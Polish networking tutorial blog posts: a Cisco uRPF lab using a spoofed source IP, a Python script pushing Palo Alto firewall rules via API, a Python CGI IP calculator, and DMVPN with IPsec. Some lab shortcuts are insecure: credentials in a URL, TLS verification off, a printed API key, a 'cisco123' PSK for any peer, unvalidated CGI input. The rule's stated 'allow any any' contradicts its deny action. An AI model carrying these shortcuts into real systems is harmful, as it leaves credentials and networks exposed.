L        192.168.12.1/32 is directly connected, FastEthernet0/0
      192.168.13.0/24 is variably subnetted, 2 subnets, 2 masks
C        192.168.13.0/24 is directly connected, FastEthernet1/0
L        192.168.13.1/32 is directly connected, FastEthernet1/0
O     192.168.23.0/24 [110/2] via 192.168.13.3, 00:14:33, FastEthernet1/0
                      [110/2] via 192.168.12.2, 00:14:33, FastEthernet0/0

Jak widać na powyższym wyniku prefix 3.3.3.3 jest osiągalny przez interfejs FastEthernet1/0, czyli interfejsu podłączonego do routera R3. Teraz ustawmy uRPF w trybie strict na interfejsach routera R1.

interface FastEthernet0/0
  ip verify unicast source reachable-via rx
!
interface FastEthernet1/0
  ip verify unicast source reachable-via rx

Przetestujmy działanie tego mechanizmu. Z routera R3 spingujmy router R1 i zobaczmy co się stanie.

R3#ping 192.168.13.1 source 3.3.3.3
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.13.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 36/46/56 ms

Jak widać wszystko przebiegło bez zarzutów, ponieważ pakiet przyszedł przez interfejs FastEthernet1/0, czyli zgodnie z tablicą CEF FIB:

R1#show ip cef 3.3.3.3
3.3.3.3/32
nexthop 192.168.13.3 FastEthernet1/0

Sprawdzić działanie uRPF możemy wykonując polecenie:

R1#show ip int fa0/0 | in verif
IP verify source reachable-via RX
0 verification drops
0 suppressed verification drops
0 verification drop-rate

Jak widać mechanizm nie odrzucił pakietów, ponieważ założenia trybu ścisłego zostały spełnione.

Teraz spróbujmy wysłać pakiet z adresem źródłowym 3.3.3.3 przez interfejs FastEthernet0/0. Najprościej jest to zrobić z routera R2, w tym celu dodajmy interfejs Loopback0 z adresem 3.3.3.3/32 i wykonajmy polecenie ping:

R2(config)#int Loopback 0
R2(config-if)#ip address 3.3.3.3 255.255.255.255
R2(config-if)#do ping 192.168.12.1 source 3.3.3.3
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.12.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3
.....
Success rate is 0 percent (0/5)

Nie otrzymaliśmy odpowiedzi, sprawdźmy więc czy rzeczywiście mechanizm zadziałał:

R1#show ip int fa0/0 | in verif
IP verify source reachable-via RX
5 verification drops
0 suppressed verification drops
0 verification drop-rate

Teraz sprawdźmy jak działa tryb luźy (loose mode). Zmieńmy konfiguracje intefejsów na R1:

interface FastEthernet0/0
  ip verify unicast source reachable-via any
!
interface FastEthernet1/0
  ip verify unicast source reachable-via any

i spróbujmy wykonać jeszcze raz polecenie ping na routerze R2:

R2#ping 192.168.12.1 source 3.3.3.3
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.12.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3
.....
Success rate is 0 percent (0/5)

Hmm, nie otrzymaliśmy odpowiedzi, czyli wynik jest taki sam jak w przypadku trybu strict, sprawdźmy to dla pewności:

R1#show ip int fa0/0 | in verif
IP verify source reachable-via ANY
5 verification drops
5 suppressed verification drops
0 verification drop-rate

Wynik powyższej komendy jest jednak inny niż w przypadku trybu strict. Sugeruje to, że pakiety nie zostały odrzucone i powinniśmy dostać odpowiedzi, dlaczego więc się tak nie stało ?

Odpowiedź jest bardzo prosta (IP spoofing), ponieważ na R2 sfałszowaliśmy adres źródłowy (3.3.3.3), router R1 odesłał odpowiedzi do tego adresu, zgodnie ze swoją tablicą routingu, czyli do R3. Wykonajmy jeszcze raz to samo polecenie ping, ale włączmy tym razem debugowanie pakietów icmp na routerze R3:

R3#debug ip icmp
R3#
*Jul 29 10:38:02.111: ICMP: echo reply rcvd, src 192.168.12.1, dst 3.3.3.3, topology BASE, dscp 0 topoid 0
R3#
*Jul 29 10:38:04.131: ICMP: echo reply rcvd, src 192.168.12.1, dst 3.3.3.3, topology BASE, dscp 0 topoid 0
R3#
*Jul 29 10:38:06.079: ICMP: echo reply rcvd, src 192.168.12.1, dst 3.3.3.3, topology BASE, dscp 0 topoid 0
R3#
*Jul 29 10:38:07.967: ICMP: echo reply rcvd, src 192.168.12.1, dst 3.3.3.3, topology BASE, dscp 0 topoid 0

Czyli wszystko działa tak jak należy

PODSUMOWANIE

uRFP jest jednym z mechanizmów ochrony przed fałszowaniem źródłowego adresu IP i powinno być wykorzystywane jeśli tylko jest taka możlwość. Dodatkowe komendy przydatne przy diagnozowani problemów z uRPF to:

R1#show ip traffic
IP statistics:
  Rcvd:  298 total, 296 local destination
         0 format errors, 0 checksum errors, 0 bad hop count
         0 unknown protocol, 0 not a gateway
         0 security failures, 0 bad options, 0 with options
  Opts:  0 end, 0 nop, 0 basic security, 0 loose source route
         0 timestamp, 0 extended security, 0 record route
         0 stream ID, 0 strict source route, 0 alert, 0 cipso, 0 ump
         0 other
  Frags: 0 reassembled, 0 timeouts, 0 couldn't reassemble
         0 fragmented, 0 fragments, 0 couldn't fragment
  Bcast: 0 received, 0 sent
  Mcast: 255 received, 285 sent
  Sent:  332 generated, 0 forwarded
  Drop:  0 encapsulation failed, 0 unresolved, 0 no adjacency
         0 no route, 7 unicast RPF, 0 forced drop, 0 unsupported-addr
         0 options denied, 0 source IP address zero

R1#show cef interface f0/0
FastEthernet0/0 is up (if_number 2)
  Corresponding hwidb fast_if_number 2
  Corresponding hwidb firstsw->if_number 2
  Internet address is 192.168.12.1/24
  ICMP redirects are always sent
  Per packet load-sharing is disabled
  IP unicast RPF check is enabled
  Input features: uRPF
  IP policy routing is disabled
  BGP based policy accounting on input is disabled
  BGP based policy accounting on output is disabled
  Hardware idb is FastEthernet0/0
  Fast switching type 1, interface type 18
  IP CEF switching enabled
  IP CEF switching turbo vector
  IP CEF turbo switching turbo vector
  IP prefix lookup IPv4 mtrie 8-8-8-8 optimized
  Input fast flags 0x4000, Output fast flags 0x0
  ifindex 2(2)
  Slot  Slot unit 0 VC -1
  IP MTU 1500

R1#show cef interface f1/0
FastEthernet1/0 is up (if_number 3)
  Corresponding hwidb fast_if_number 3
  Corresponding hwidb firstsw->if_number 3
  Internet address is 192.168.13.1/24
  ICMP redirects are always sent
  Per packet load-sharing is disabled
  IP unicast RPF check is enabled
  Input features: uRPF
  IP policy routing is disabled
  BGP based policy accounting on input is disabled
  BGP based policy accounting on output is disabled
  Hardware idb is FastEthernet1/0
  Fast switching type 1, interface type 18
  IP CEF switching enabled
  IP CEF switching turbo vector
  IP CEF turbo switching turbo vector
  IP prefix lookup IPv4 mtrie 8-8-8-8 optimized
  Input fast flags 0x4000, Output fast flags 0x0
  ifindex 3(3)
  Slot  Slot unit 0 VC -1
  IP MTU 1500

Palo Alto API tworzenie reguł – Python skrypt

admin — Mon, 19 Mar 2018 19:33:04 +0000

Korzystając z API możemy na firewallach Palo Alto dodawać reguły bezpieczeństwa bez konieczności otwierania interfejsu do zarządzania i tworzenia reguł wybierając odpowiednie opcje z menu.

ŚRODOWISKO

Do celów demonstracji możliwości tworzenia reguł bezpieczeństwa przy pomocy API na urządzeniach Palo Alto posłużyłem się topologią zbudowaną w GNS3, tą samą co w tym wpisie.

TOPOLOGIA

SKRYPT

Skrypt tworzący regułę bezpieczeństwa, przenoszący ją w odpowiednie miejsce a na końcu robiący commit zmian wygląda następująco:

config_palo.py

#!/usr/bin/python

import requests, getpass, re

## list of firewalls
firewalls_ip = [
 '192.168.0.201',
 '192.168.0.202',
 '192.168.0.203',
]

## login and password for firewall
username = raw_input("Please enter your username: ") 
password = getpass.getpass("Please enter your password: ")

## generate api key
url = "https://192.168.0.201/api/?type=keygen&user={}&password={}"
response = requests.get(url.format(username,password), verify=False)
response.raise_for_status()
regex = re.compile(r'(.*)<\/key>')
key = regex.findall(response.text)[0]
print ("\nYour API key is: %s\n") % (key)

rule_path = "/config/devices/entry[@name='localhost.localdomain']/vsys/entry[@name='vsys1']/rulebase/security/rules"
rule_name = "permit_any"

rule = """
 
 
 any
 
 
 any
 
 
 any
 
 
 any
 
 
 any
 
 
 any
 
 
 any
 
 
 any
 
 
 any
 
 deny
 no
 permit any any rule
 no
 
"""

for ip in firewalls_ip:

 print ("Adding security rule to: %s\n") % (ip)
 url = "https://"+ip+"/api/?type=config&action=set&key={}&xpath={}&element={}"

 response = requests.post(url.format(key,rule_path,rule.format(rule_name)), verify=False)
 response.raise_for_status()
 print (response.text)

 print ("Moving security rule ...\n")
 move = raw_input("Do you want to move security rule ? (y/n) ")
 if move == "y":
  rule_pos = raw_input("Insert rule name after which you want to place new rule: ")
  url = "https://"+ip+"/api/?type=config&action=move&key={}&xpath={}/entry[@name='{}']&where=after&dst={}"
  response = requests.get(url.format(key,rule_path,rule_name,rule_pos), verify=False)
  response.raise_for_status()
  print (response.text)

 print ("Commiting changes ...\n")
 commit = raw_input("Are you sure you want to commit ? (y/n) ")
 if commit == "y":
  url = "https://"+ip+"/api/?type=commit&key={}&cmd="
  commit_response = requests.post(url.format(key),verify=False)
  commit_response.raise_for_status()
  print (response.text)
 else:
  print ("Commit cancelled !\n")

Cały skrypt można ściągnąć pod tym linkiem.

Opis skryptu:

Lista IP z firewallami na których chcemy stworzyć regułę bezpieczeństwa:

firewalls_ip = [
 '192.168.0.201',
 '192.168.0.202',
 '192.168.0.203',
]

2. Stworzenie klucza API KEY przy pomocy logowania użytkownikiem i hasłem do jednego z firewalli z listy (pod warunkiem ze na każdym FW mamy tego samego użytkownika i hasło, w innym przypadku klucz musimy generować dla każdego z FW osobno)

## login and password for firewall
username = raw_input("Please enter your username: ") 
password = getpass.getpass("Please enter your password: ")

## generate api key
url = "https://192.168.0.201/api/?type=keygen&user={}&password={}"
response = requests.get(url.format(username,password), verify=False)
response.raise_for_status()
regex = re.compile(r'(.*)<\/key>')
key = regex.findall(response.text)[0]
print ("\nYour API key is: %s\n") % (key)

3. Stworzenie zmiennej o nazwie „rule” zawierającej regułę w postaci xml. Można taką regułę odczytać z pliku xml z konfiguracją. W powyższym skrypcie reguła zezwala na cały ruch z każdej strefy i każdego adresu do każdej strefy i do każdego adresu (allow any any)

rule_path = "/config/devices/entry[@name='localhost.localdomain']/vsys/entry[@name='vsys1']/rulebase/security/rules"
rule_name = "permit_any"

rule = """
 
 
 any
 
 
 any
 
 
 any
 
 
 any
 
 
 any
 
 
 any
 
 
 any
 
 
 any
 
 
 any
 
 deny
 no
 permit any any rule
 no
 
"""

4. Tworzenie reguły dla każdego firewalla z listy firewalls_ip:

for ip in firewalls_ip:

  print ("Adding security rule to: %s\n") % (ip)
  url = "https://"+ip+"/api/?type=config&action=set&key={}&xpath={}&element={}"
 
  response = requests.post(url.format(key,rule_path,rule.format(rule_name)), verify=False)
  response.raise_for_status()
  print (response.text)

5. Reguła stworzona w poprzednim punkcie jest tworzona i dodawana do konfiguracji na końcu. Zmianę miejsca reguły realizuje poniższy fragment skryptu:

 print ("Moving security rule ...\n")
 move = raw_input("Do you want to move security rule ? (y/n) ")
 if move == "y":
   rule_pos = raw_input("Insert rule name after which you want to place new rule: ")
   url = "https://"+ip+"/api/?type=config&action=move&key={}&xpath={}/entry[@name='{}']&where=after&dst={}"
   response = requests.get(url.format(key,rule_path,rule_name,rule_pos), verify=False)
   response.raise_for_status()
   print (response.text)

6. Commit zmian:

 print ("Commiting changes ...\n")
 commit = raw_input("Are you sure you want to commit ? (y/n) ")
 
 if commit == "y":
   url = "https://"+ip+"/api/?type=commit&key={}&cmd="
   commit_response = requests.post(url.format(key),verify=False)
   commit_response.raise_for_status()
   print (response.text)
 else:
   print ("Commit cancelled !\n")

Sprawdźmy działanie skryptu w praktyce:

Na początek sprawdźmy jak wygląda zakładka Policies -> Security na każdym z firewalli:

Teraz uruchamiamy skrypt…

root@NetworkAutomation-1:~# ./config_palo.py
Please enter your username: admin
Please enter your password:
/usr/local/lib/python2.7/dist-packages/urllib3/connectionpool.py:858: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
InsecureRequestWarning)

Your API key is: LUFRPT14MW5xOEo1R09KVlBZNnpnemh0VHRBOWl6TGM9bXcwM3JHUGVhRlNiY0dCR0srNERUQT09

Adding security rule to: 192.168.0.201

/usr/local/lib/python2.7/dist-packages/urllib3/connectionpool.py:858: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
InsecureRequestWarning)
command succeeded
Moving security rule ...

Do you want to move security rule ? (y/n) n
Commiting changes ...

Are you sure you want to commit ? (y/n) y
/usr/local/lib/python2.7/dist-packages/urllib3/connectionpool.py:858: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
InsecureRequestWarning)
command succeeded
Adding security rule to: 192.168.0.202

Do you want to move security rule ? (y/n) n
Commiting changes ...

Skrypt wykonał się z ostrzeżeniami, ale możemy je zignorować. Pojawiły się one, ponieważ wszystkie urządzenia posiadają domyślne certyfikaty, które nie są zaufane.

Zobaczmy teraz jak wyglądają polityki bezpieczeństwa po działaniu skryptu:

PODSUMOWANIE

Jak widać API na urządzeniach Palo Alto umożliwia w łatwy sposób tworzyć reguły bezpieczeństwa. Jest to bardzo przydatne w sytuacji, gdy musimy tą samą regułę stworzyć na wielu urządzeniach.

Programowanie CGI Pythona

admin — Sat, 03 Feb 2018 19:05:56 +0000

Czym jest CGI ?

(ang. Common Gateway Interface) – jest standardowym sposobem przekazywania przez serwer www żądania użytkownika do aplikacji i odbierania danych od aplikacji i przekazywanie ich użytkownikowi. Gdy użytkownik odwiedza stronę internetową (np. wprowadzając adres strony internetowej), serwer odsyła żądaną stronę. Takie działanie ma miejsce w przypadku stron statycznych, jednakże obecnie mamy w internecie przewagę stron dynamicznych, w przypadku których prezentowana strona jest generowana dynamicznie przez aplikację. Dzieje się tak na przykład w przypadku formularza na stronie internetowej. Użytkownik wypełnia dane w formularzu, przesyła je do serwera, następnie serwer otrzymane dane przesyła do aplikacji, która następnie przetwarza otrzymanie dane i zwraca wynik działania do użytkownika. Ta metoda, lub konwencja przekazywania danych tam i z powrotem między serwerem a aplikacją nazywa się CGI.

Konfiguracja serwera WWW

W celu poprawnego działania skryptów CGI konieczne jest odpowiednie skonfigurowanie serwera www. W moim przypadku serwerem www jest Apache i pokażę jak go skonfigurować do pracy z CGI. Konfigurację apache możemy wykonać w następujących krokach:

Krok 1.

Edytujemy zawartość pliku z naszą stroną (/sites-available/000-default.conf) odkomentowując linijkę: Include conf-available/serve-cgi-bin.conf

root@ubuntu-2:/usr/lib/cgi-bin# nano /etc/apache2/sites-available/000-default.conf


        # The ServerName directive sets the request scheme, hostname and port 
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.

        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".

        Include conf-available/serve-cgi-bin.conf

Krok 2.

Edytujemy plik conf-available/serve-cgi-bin.conf

         
                ScriptAlias /cgi-bin/ /home/kuba/scripts/
                /home/kuba/scripts/">
                        AllowOverride None
                        Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                        Require all granted
                        AddHandler cgi-script .py

ScriptAlias wskazuje gdzie będą przetrzymywane nasze skrypty, domyślnie jest to katalog /var/www/cgi-bin, natomiast możemy tu ustawić dowolny inny katalog. Ja ustawiłem katalog /home/kuba/scripts.

AddHandler wskazuje jakie rozszerzenia skryptów będziemy obsługiwać (w moim przypadku będą to skrypty python więc dodałem rozszerzenie .py)

Krok 3.

Aktywujemy moduł cgi w apache i restartujemy apache’a.

root@ubuntu-2:/usr/lib/cgi-bin# a2enmod cgi
root@ubuntu-2:/usr/lib/cgi-bin# systemctl restart apache2

Pierwszy skrypt

Stwórzmy sobie pierwszy skrypt python, który wygeneruje nam stronę www z treścią Hello World !!!.

Skrypt ten wygląda następująco:

#!/usr/bin/python

print("Content-Type: text/html\n\n")
print('''


Hello World - script


Hello Word !!!


''')

Następnie skrypt musimy umieścić w naszym katalogu ze skryptami (/home/kuba/scripts) i nadać mu atrybuty wykonywalności (chmod +x).

Teraz pozostaje tylko otwarcie odpowiedniego linku w przeglądarce:

http://192.168.48.142/cgi-bin/hello.py

gdzie:

192.168.48.142 to adres naszego serwera,

hello.py to nazwa naszego skryptu.

Jeśli wszystko przebiegło pomyślnie naszym oczom powinna ukazać strona z zawartościa Hello World !!!.

KALKULATOR IP W PYTHON

Teraz spróbujmy napisać coś bardziej zaawansowanego w python, a mianowicie kalkulator IP. Do tego celu posłuży nam wbudowana Pythona biblioteka ipaddress, która umożliwia pracę z adresami IP.

Cała aplikacja będzie składać się z 3 plików:

/var/www/html/index.html
/home/kuba/scripts/script.py
/home/kuba/scripts/calc.py

Zawartość plików jest następująca:

/var/www/html/index.html

IP Calculator

Python IP Calculator

2. /home/kuba/scripts/script.py

#!/usr/bin/python

print("Content-Type: text/html\n\n")
print('''


IP Calculator


INSERT IP AND SUBNET


 IP Address (eg. 192.168.0.0)

 Subnet Mask (eg. 24)





''')

3. /home/kuba/scripts/calc.py

#!/usr/bin/python

import cgi, cgitb, ipaddress

form = cgi.FieldStorage()
ip = form.getvalue('ip')
subnet = form.getvalue('subnet')
ips = unicode(ip+"/"+subnet)
intf = ipaddress.ip_interface(ips)
netmask = intf.with_netmask.split("/")[1]

print("Content-Type: text/html\n\n")
print('''


IP Calculator


RESULTS

''')

print"IP Address %s
" % (ip)
print"Subnet Mask %s = %s
" % (netmask,subnet)
print"Wildcard Mask %s
" % (intf.network.with_hostmask.split('/')[1])
print"Network %s
" % (intf.network.with_prefixlen)
print"Broadcast %s
" % (intf.network.broadcast_address)
print"Host Min %s
" % (intf.network[1])
print"Host Max %s
" % (intf.network[-2])
print"Hosts/Net %s
" % (intf.network.num_addresses-2)

print('''



''')

Zasada działania kalkulatora jest następująca:

Klient wchodzi na stronę http://192.168.48.142/index.html (plik /var/www/html/index.html). Strona składa się z ramki, w której wyświetlany jest wynik skryptu script.py. Wynikiem działania skryptu script.py jest formularz, składający się z pól tekstowych ip i subnet, oraz przycisku Calc, który uruchamia skrypt calc.py. Skrypt calc.py wykonuje operacje na podanych w formularzu polach ip i subnet i prezentuje na ich podstawie następujące wyniki:

IP Address – adres IP podany w formularzu,

Subnet Mask – maska podsieci podana w formularzu,

Wildcard Mask – maska w formacie wildard’owym,

Network – adres sieci,

Broadcast – adres rozgłoszeniowy,

Host Min – najmniejszy adres dostępny dla hosta,

Host Max – największy adres dostępny dla hosta,

Hosts/Net – ilość adresów dostępna dla hostów.

WYNIK

Sprawdźmy teraz jak wygląda aplikacja kalkulatora IP z punku widzenia klienta i jego przeglądarki. Otwórzmy w tym celu stronę index.html:

PODSUMOWANIE

Na powyższym przykładzie aplikacji www kalkulatora IP, widać, że Python z CGI dają olbrzymie możliwości tworzenia aplikacji internetowych przy wykorzystaniu skryptów. Oczywiście powyższe zastosowanie nie jest najlepszą i najwydajniejsza metodą tworzenia stron internetowych, ale pokazuję, że właściwie bez zaawansowanej znajomości kodowania stron www, możemy tworzyć łatwe formularze czy aplikacje wykorzystując skrypty Pythona. Do bardziej zaawansowanych aplikacji można skorzystać z nowoczesnego frameworka opartego na Pythonie a mianowicie Django.

DMVPN faza 1 + IPSEC – konfiguracja

admin — Tue, 02 Jan 2018 19:36:21 +0000

We wpisie https://kubsoo.github.io/rsnet-website/dmvpn-faza-1-konfiguracja/ pokazałem jak skonfigurować DMVPN w fazie 1 z dynamicznymi mapowaniami NHRP. W tym wpisie pokażę jak do tak przygotowanej konfiguracji dodać konfigurację IPSEC, tak żeby łączność pomiędzy urządzeniami była zabezpieczona przy wykorzystaniu IPSEC.

Przypomnijmy jeszcze raz topologię oraz konfigurację DMVPN w fazie 1 z dynamicznymi mapowaniami NHRP.

Topologia

Konfiguracja DMVPN

hostname HUB
!
interface Tunnel0
 ip address 172.22.10.1 255.255.255.0
 ip nhrp network-id 123
 tunnel source FastEthernet0/0
 tunnel mode gre multipoint
!
interface FastEthernet0/0
 ip address 192.168.10.1 255.255.255.0
!

hostname SPOKE1
!
interface Tunnel0
 ip address 172.22.10.2 255.255.255.0
 ip nhrp map 172.22.10.1 192.168.10.1
 ip nhrp network-id 123
 ip nhrp nhs 172.22.10.1
 tunnel source FastEthernet0/0
 tunnel destination 192.168.10.1
!
interface FastEthernet0/0
 ip address 192.168.10.2 255.255.255.0
!

hostname SPOKE2
!
interface Tunnel0
 ip address 172.22.10.3 255.255.255.0
 ip nhrp map 172.22.10.1 192.168.10.1
 ip nhrp network-id 123
 ip nhrp nhs 172.22.10.1
 tunnel source FastEthernet0/0
 tunnel destination 192.168.10.1
!
interface FastEthernet0/0
 ip address 192.168.10.3 255.255.255.0
!

hostname SPOKE3
!
interface Tunnel0
 ip address 172.22.10.4 255.255.255.0
 ip nhrp map 172.22.10.1 192.168.10.1
 ip nhrp network-id 123
 ip nhrp nhs 172.22.10.1
 tunnel source FastEthernet0/0
 tunnel destination 192.168.10.1
!
interface FastEthernet0/0
 ip address 192.168.10.4 255.255.255.0
!

KONFIGURACJA IPSEC

Przed przystąpieniem do konfigurowania IPSEC sprawdźmy jak wygląda ruch w DMVPN widziany na interfejsie fa0/0 routera R1. Posłużymy się do tego wiresharkiem:

Po uruchomieniu wiresharka spingujmy router R3 (SPOKE-2) z routera R2 (SPOKE-1). W tym celu wydajmy polecene ping 172.22.10.3 na routerze R2 (SPOKE-1).

SPOKE1#ping 172.22.10.3
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 172.22.10.3, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 28/40/60 ms

Sprawdźmy jak wygląda ten ruch w wiresharku:

Widzimy, że ruch nie jest szyfrowany i możemy go podsłuchać. Spróbujmy go teraz zabezpieczyć przy pomocy IPSECa.

Konfiguracja IPSEC na każdym routerze wygląda tak samo:

R1 (HUB), R2 (SPOKE1), R3 (SPOKE2), R4 (SPOKE3)

crypto isakmp policy 10
 encr aes
 authentication pre-share
 group 2
crypto isakmp key cisco123 address 0.0.0.0
!
!
crypto ipsec transform-set TSET esp-aes esp-sha-hmac
 mode transport
!
crypto ipsec profile IPSEC_PROFILE
 set transform-set TSET
!
int tunnel 0
 tunnel protection ipsec profile IPSEC_PROFILE

Po skonfigurowaniu IPSEC sprawdźmy czy zestawił się on poprawnie (isakmp sa i ipsec sa). Wystarczy, że dokonamy sprawdzenia na routerze R1 (HUB), ponieważ routery R2, R3, R4 zestawiają tunele tylko z nim.

R1 (HUB)

HUB#show crypto isakmp sa
IPv4 Crypto ISAKMP SA
dst src state conn-id status
192.168.10.4 192.168.10.1 QM_IDLE 1005 ACTIVE
192.168.10.1 192.168.10.4 QM_IDLE 1004 ACTIVE
192.168.10.1 192.168.10.3 QM_IDLE 1003 ACTIVE
192.168.10.1 192.168.10.2 QM_IDLE 1001 ACTIVE
192.168.10.2 192.168.10.1 QM_IDLE 1002 ACTIVE
192.168.10.3 192.168.10.1 QM_IDLE 1006 ACTIVE

HUB#show crypto ipsec sa

interface: Tunnel0
 Crypto map tag: Tunnel0-head-0, local addr 192.168.10.1

protected vrf: (none)
 local ident (addr/mask/prot/port): (192.168.10.1/255.255.255.255/47/0)
 remote ident (addr/mask/prot/port): (192.168.10.3/255.255.255.255/47/0)
 current_peer 192.168.10.3 port 500
 PERMIT, flags={origin_is_acl,}
 #pkts encaps: 6, #pkts encrypt: 6, #pkts digest: 6
 #pkts decaps: 7, #pkts decrypt: 7, #pkts verify: 7
 #pkts compressed: 0, #pkts decompressed: 0
 #pkts not compressed: 0, #pkts compr. failed: 0
 #pkts not decompressed: 0, #pkts decompress failed: 0
 #send errors 0, #recv errors 0

local crypto endpt.: 192.168.10.1, remote crypto endpt.: 192.168.10.3
 path mtu 1500, ip mtu 1500, ip mtu idb (none)
 current outbound spi: 0x4D074ABE(1292323518)
 PFS (Y/N): N, DH group: none

inbound esp sas:
 spi: 0xA8B99213(2830733843)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 7, flow_id: 7, sibling_flags 80000000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4329808/3210)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)
 spi: 0x81E2FE13(2179137043)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 9, flow_id: 9, sibling_flags 80004000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4282574/3210)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)
 spi: 0x7BDEB7FE(2078193662)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 17, flow_id: 17, sibling_flags 80004000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4298093/3218)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)

inbound ah sas:

inbound pcp sas:

outbound esp sas:
 spi: 0x2B6C154D(728503629)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 8, flow_id: 8, sibling_flags 80000000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4329808/3210)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)
 spi: 0x1A5D7249(442331721)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 10, flow_id: 10, sibling_flags 80004000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4282574/3210)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)
 spi: 0x4D074ABE(1292323518)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 18, flow_id: 18, sibling_flags 80004000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4298093/3218)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)

outbound ah sas:

outbound pcp sas:

protected vrf: (none)
 local ident (addr/mask/prot/port): (192.168.10.1/255.255.255.255/47/0)
 remote ident (addr/mask/prot/port): (192.168.10.2/255.255.255.255/47/0)
 current_peer 192.168.10.2 port 500
 PERMIT, flags={origin_is_acl,}
 #pkts encaps: 6, #pkts encrypt: 6, #pkts digest: 6
 #pkts decaps: 7, #pkts decrypt: 7, #pkts verify: 7
 #pkts compressed: 0, #pkts decompressed: 0
 #pkts not compressed: 0, #pkts compr. failed: 0
 #pkts not decompressed: 0, #pkts decompress failed: 0
 #send errors 0, #recv errors 0

local crypto endpt.: 192.168.10.1, remote crypto endpt.: 192.168.10.2
 path mtu 1500, ip mtu 1500, ip mtu idb (none)
 current outbound spi: 0x72B18574(1924236660)
 PFS (Y/N): N, DH group: none

inbound esp sas:
 spi: 0x532102AC(1394672300)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 1, flow_id: 1, sibling_flags 80000000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4349860/3205)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)
 spi: 0xA0B95616(2696500758)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 3, flow_id: 3, sibling_flags 80004000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4203743/3205)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)
 spi: 0x3D891B1C(1032395548)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 5, flow_id: 5, sibling_flags 80004000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4371005/3208)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)

inbound ah sas:

inbound pcp sas:

outbound esp sas:
 spi: 0x8888EE44(2290675268)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 2, flow_id: 2, sibling_flags 80000000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4349860/3205)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)
 spi: 0x85FE093(140501139)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 4, flow_id: 4, sibling_flags 80004000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4203743/3205)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)
 spi: 0x72B18574(1924236660)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 6, flow_id: 6, sibling_flags 80004000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4371005/3208)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)

outbound ah sas:

outbound pcp sas:

protected vrf: (none)
 local ident (addr/mask/prot/port): (192.168.10.1/255.255.255.255/47/0)
